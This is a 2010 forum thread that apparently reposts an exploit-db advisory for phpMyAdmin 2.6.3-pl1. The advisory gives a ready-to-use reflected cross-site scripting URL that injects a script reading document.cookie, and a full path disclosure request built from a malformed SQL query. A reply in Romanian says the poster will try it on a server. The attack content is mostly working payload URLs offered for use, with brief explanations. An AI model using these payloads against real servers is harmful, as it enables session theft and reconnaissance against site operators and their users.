begood Posted May 18, 2010 Report Posted May 18, 2010 [URL="http://www.exploit-db.com/exploits/12642?utm_source=twitterfeed&utm_medium=twitter#viewSource"]view source[/URL][URL="http://www.exploit-db.com/exploits/12642?utm_source=twitterfeed&utm_medium=twitter#printSource"]print[/URL][URL="http://www.exploit-db.com/exploits/12642?utm_source=twitterfeed&utm_medium=twitter#about"]?[/URL]# Exploit Title: phpMyAdmin 2.6.3-pl1 Cross Site Scripting and Full PathDisclosure.# Date: 20/04/10# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | [URL="http://www.digitalwhisper.co.il/"]www.DigitalWhisper.co.il[/URL]# Software Link: [URL="http://www.phpmyadmin.net/"]www.phpmyadmin.net[/URL] |[url=http://www.phpmyadmin.net/home_page/downloads.php]phpMyAdmin - Download[/url]# Version: 2.6.3-pl1# Tested on: PHP###[Cross Site Scripting]*(Cross-Site Scripting attacks are a type of injection problem, in whichmalicious scripts are injected into the otherwise benign and trusted websites. Cross-site scripting (XSS) attacks occur when an attacker uses a webapplication to send malicious code, generally in the form of a browser sidescript, to a different end user. Flaws that allow these attacks to succeedare quite widespread and occur anywhere a web application uses input from auser in the output it generates without validating or encoding it)http://[server]/phpmyadmin/left.php?lang=he-iso-8859-8-i&server=1&hash=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E####[FULL PATH DICSLOSURE]**(Full Path Disclosure (FPD) vulnerabilities enable the attacker to see thepath to the webroot/file. e.g.: /home/omg/htdocs/file/. Certainvulnerabilities, such as using the load_file() (within a SQL Injection)query to view the page source, require the attacker to have the full path tothe file they wish to view. (OWASP))#http://[server]/phpmyadmin/sql.php?lang=he-iso-8859-8-i&server=1&db=x&table=x&sql_query=1'#Will returne:#Fatal error: Cannot use string offset as an array in [FPD] on line 901##*The victim must be logged in.**The attacker must be logged in.##[e0f] Quote
Fitty Posted May 18, 2010 Report Posted May 18, 2010 Chiar aveam nevoie sa aflu Document Root la un server la care am acces si ruleaza 2.6.3.Mersi mult, sa vedem daca merge Quote